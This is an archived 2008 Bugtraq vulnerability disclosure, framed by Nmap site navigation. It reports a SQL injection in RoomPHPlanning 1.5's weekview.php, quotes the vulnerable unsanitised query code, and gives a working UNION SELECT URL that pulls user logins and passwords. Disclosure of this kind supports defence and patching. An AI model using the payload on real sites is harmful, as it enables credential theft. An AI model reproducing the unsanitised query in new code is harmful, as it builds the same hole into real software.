Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: RoomPHPlanning 1.5 (weekview.php) SQL Injection Vulnerability

RoomPHPlanning 1.5 (weekview.php) SQL Injection Vulnerability

From: <hadihadi_zedehal_2006_at_yahoo.com>
Date: 27 May 2008 01:05:53 -0000
('binary' encoding is not supported, stored as-is)             
  #######################################################################################
  # #
  # ...::::RoomPHPlanning((weekview.php)) 1.5 SQL Injection Vulnerabilities ::::... #
  #######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----

-------vuln codes in:-----------

weekview.php:
@$idroom = $_GET['idroom'];
....
line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ".
                "FROM ".ROOM." WHERE IdRm=".$idroom ; 

---
exploit:
http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*
---
young iranian h4ck3rz
Received on May 27 2008
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]